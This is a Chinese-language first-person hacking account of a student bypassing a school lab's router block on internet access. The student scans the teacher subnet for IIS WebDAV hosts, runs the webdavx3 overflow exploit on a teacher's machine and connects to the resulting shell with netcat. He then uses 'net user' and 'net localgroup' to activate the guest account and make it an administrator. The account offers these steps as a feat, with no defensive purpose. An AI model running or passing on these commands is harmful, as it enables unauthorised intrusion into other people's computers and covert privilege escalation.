突破路由限制随心所欲上网冲浪

　　为了预防非典，学校实行封闭式管理，学校内外的网吧又全部关闭，本来学校的机房周六周日对外开放可以上网，现在学校一声令下也不许开。这可苦死了我们一帮网虫呀，好在为了不影响教学质量我们平时的上机实验还是正常进行，我们学校那个机房联网方式是，教师和学生机分两个字网分别是192.168.0.0和192.168.18.0为了方便文件共享2个网络通过win2000的软路由连接。我们平时上机时老师就对win2000的软路由进行限制。丢弃所有学生子网访问外网的数据包，但2个子网之间可以正常访问说到这里聪明的朋友已经知道了怎么样突破了吧。对。只要我们访问外网的数据包都通过教师的机器转发，就可以解决问题了。因为路由认为我们是访问教师的机器，便让数据包通过而教师机再访问外网是不受限制的。原理并不难关键是怎么样在教师机器上装代理软件。总不能跑到教师办公室里和教师说吧！既然这样不行的话，我们就得用点非常规手段啦！由于现在webdavx溢出非常流行，所以我就用WebDAVScan对教师子网全方位扫描，果然不出我的所料。发现了2台。
　　
　　192.168.18.5 iis5.0 enable
　　192.168.18.18 iis5.0 enable
　　看来我的运气还是挺好的.接下来开始夺权吧
　　f:\>hacker\tools\webdavx3 192.168.18.5
　　IIS WebDAV overflow remote exploit by isno@xfocus.org
　　start to try offset,
　　if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
　　try offset: 0
　　try offset: 1
　　waiting for iis restart.......................
　　try offset: 2
　　waiting for iis restart....................... (IIS reboot,just waiting...)
　　程序运行到这里停顿稍长时间,若停顿时间比较长而无反应,^C)
　　^C
　　f:\>hacker\tools\nc -vv 192.168.18.5 7788
　　进入目标机c:\winnt\system32
　　现在嘛，我是老大我怕谁！
　　c:\net user guest /active:yes
　　c:\net localgroup administrators guest /add
　　把guest用户激活并提升为管理员。